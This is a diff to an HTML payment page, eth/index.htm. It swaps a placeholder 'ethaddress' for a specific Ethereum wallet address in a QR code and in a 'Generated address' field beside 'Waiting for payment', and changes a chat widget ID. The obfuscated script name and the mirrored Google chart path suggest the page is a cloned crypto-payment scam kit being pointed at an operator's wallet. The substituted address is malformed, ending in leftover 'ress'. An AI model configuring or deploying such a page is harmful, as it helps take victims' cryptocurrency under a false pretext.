--- a/eth/index.htm
+++ b/eth/index.htm
@@ -52,7 +52,7 @@
                             <div class="pop-qr">
                                 <div class="inner-qr">
                                     <div class="main-qr">
-                                        <div opacity="0" class="qr"><img id="qrcode_svg" width="200" height="200" src="../../chart.googleapis.com/chart5c3f.png?chs=130x130&chld=L|0&cht=qr&chl=ethereum:ethaddress" alt="qr"></div><span class="wallet">Waiting for payment</span>
+                                        <div opacity="0" class="qr"><img id="qrcode_svg" width="200" height="200" src="../../chart.googleapis.com/chart5c3f.png?chs=130x130&chld=L|0&cht=qr&chl=ethereum:0xC09505C15cBFFE75BC4d33903B41999227CB8E39ress" alt="qr"></div><span class="wallet">Waiting for payment</span>
                                         <center><img src="../files/loading.svg" width="70px"></center>
                                     </div>
                                 </div>
@@ -76,7 +76,7 @@
 
                             <div class="inner-address"><span class="wallet-ad">Generated address:</span>
                                 <div class="address">
-                                    <div class="main-ad"><span class="real-address">ethaddress</span></div>
+                                    <div class="main-ad"><span class="real-address">0xC09505C15cBFFE75BC4d33903B41999227CB8E39ress</span></div>
                                     <div class="copy-body">
                                         <div class="copy-inner">
                                             <img class="cp" id="copy_address" src="../files/copy.svg">
@@ -367,7 +367,7 @@
     <script src="../files/jdfghkjdfhgvsjkdfgcphjkfdhgjsdfg.js"></script>
     <script src="custom.js"></script>
     <!--Start of Tawk.to Script-->
-   <script src="//code.jivosite.com/widget/7yjSqqXtuI" async></script>
+   <script src="//code.jivosite.com/widget/9LI7Xw5vOG" async></script>
     <!--End of Tawk.to Script-->
 </body>
 
